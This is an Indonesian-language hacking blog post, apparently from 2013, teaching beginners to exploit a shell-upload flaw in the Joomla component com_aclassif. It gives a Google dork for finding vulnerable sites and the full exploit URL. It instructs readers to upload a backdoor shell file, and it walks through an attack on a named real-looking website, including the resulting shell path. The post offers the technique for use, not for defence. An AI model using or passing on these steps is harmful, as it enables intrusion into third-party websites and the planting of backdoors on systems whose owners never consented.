• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Exploit Joomla Component com_aclassif shell upload Vulnerability

July 31, 2013 by Jack Wilder 1 Comment

Ini exploit lama sih. tapi baru nemu tadi di grup. Yaudah sekalian share di blog. Mungkin berguna buat newbie seperti saya . =)).
Oke, langsung saja.
Bahan :
1. backdoor shell, file .html / .txt
2. dork : inurl:”index.php?option=com_aclassif”
3. Exploit : index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1
Langsung saja kita cari target di google dengan dork diatas.

Sebagai contoh, saya dapet target http://www.stabledock.com/
masukkan exploitnya menjadi : http://www.stabledock.com/index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

Tinggal isi data datanya. Boleh ngasal kok. Terakhir, upload filenya di attachment .
NB : beberapa situs memungkinkan kita untuk upload file .php dan .html , namun ada juga yang hanya bisa upload .txt seperti situs diatas.

Jika sudah, tinggal klik link yang ada di keterangan seperti gambar diatas.
http://www.stabledock.com/components/com_aclassif/photos/mtmd23.txt

Sekian tutorial kali ini. Semoga bermanfaat.

Shares

Filed Under: Uncategorized Tagged With: Hacking

Reader Interactions

Comments

  1. cak oni says

    August 2, 2013 at 6:21 am

    Petrumax kang semoga mudiknya lancar kang amin 😀

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

WordPress Plugin CopySafe PDF Protection Shell Upload

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Hack Targeted Website using Reverse IP

Prestashop Module Blocktestimonial File Upload Auto Exploit

Tumblr Custom Domain or Subdomain Takeover

Uptimerobot.com Custom Domain or Subdomain Takeover

Cara Mudah Hack cPanel dengan Fitur Reset Password

FastMail Custom Domain or Subdomain Takeover

LinuxSec / 85 queries in 0.24 seconds